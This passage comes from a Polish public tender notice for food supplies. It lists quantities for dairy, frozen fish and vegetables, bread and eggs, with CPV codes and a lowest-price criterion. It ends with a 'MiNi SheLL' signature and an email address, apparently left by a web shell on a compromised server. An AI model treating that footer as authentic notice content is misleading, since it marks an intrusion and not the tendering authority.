25	Kapusta kiszona (5kg)	65	920	Kg.			
26	Banany	60	500	Kg			
27	Gruszki	60	300	Kg			
28	Jabłka	50	600	kg			
29	Mandarynki	30	200	Kg.			
30	Pomarańcze	50	300	Kg.			
31	Sałata	40	100	szt			
32	Szczaw konserwowy 970g.	6	70	szt			
33	Barszcz czerwony koncentrat 330 ml.	3	20	szt.			
34	Kiwi	300	600	Szt.			
35	Szczypior	10	50	Pęcz.			
36	Śliwka renkloda czarna	20	50	kg			
Ogółem: *	X	X			
* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać  do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 4 dotyczy:
     Produkty mleczarskie, kod CPV 15500000-3 
     Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony   
     w formularzu cenowym, który stanowi załącznik nr 2 Zadanie część 4 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Śmietana 400 ml. 18g tłuszczu	350	2650	Szt.			
2	Mleko pasteryzowane1l. 2% tłuszczu	60	300	Szt.			
3	Masło 200g	2	10	Kg			
4	Ser twardy Zółty	8	80	Kg.			
5	Twaróg półtłusty	18	80	Kg.			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 5 dotyczy:
     Ryby przetworzone i konserwowane, kod CPV 15200000-0
                    Produkty głęboko mrożone, kod CPV 158960000-5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Filet rybny (miruna ze skórą SHP	30	330	Kg.			
2	Paluszki rybne z fileta	32	200	Kg.			
3	Pyzy ziemniaczane 500g	96	400	Szt.			
4	Pyzy ziemn. z mięsem 450g, mięso 17,5%	35	150	szt			
5	Mieszanka kompotowa czarna porzeczka	2,5	20	Kg			
6	Kalafior mrożony	10	60	Kg			
7	Truskawka mrożona 	15	165	Kg			
8	Mieszanka komp. z pestką	7,5	45	Kg			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 6 dotyczy:
      Pieczywo świeże wyroby piekarskie i ciastkarskie kod CPV 15810000-9
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 6 do  SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Chleb krojony  0,60 kg	37	390	szt.			
2	Bułka zwykła 0,08g	120	1200	szt.			
3	Bułka tarta 0,50 kg	20	170	szt.			
4	Pączki 	30	300	szt.			
5	Bułki słodkie z dżemem, twarogiem, makiem	30	300	szt.			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przedmiot zamówienia w zakresie zadania część nr 7 dotyczy:
      Jaja kurze konsumpcyjne świeże klasa A  kod CPV 03142500-3
      Szczegółowy zakres, ilość, opis i wyszczególnienie przedmiotu zamówienia został określony w    
      formularzu cenowym, który stanowi załącznik  nr  2 Zadanie część 7 do  SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu, wyrobu opis, 
wielkość opakowania	Orienta-cyjna ilość towaru 
w m-cu	Łączna ilość towaru  od 01.01.2012r. do31.12.2012r	Jed.
 miary	Cena
Jednost. 
netto	Cena
Jednost. 
brutto *	Łączna wartość towaru w roku /ilość x cena brutto/*        
1	Jaja kurze XL klasa A
/opakowanie 10 szt./	50	500	opak			
                                                                                                 Ogółem: *	X	X			

* Kolumny do wypełnienia przez wykonawcę z dokładnością do dwóch miejsc po przecinku.
* Wyliczoną wartość oferty asortymentowej z poz. Ogółem należy wpisać do formularza ofertowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com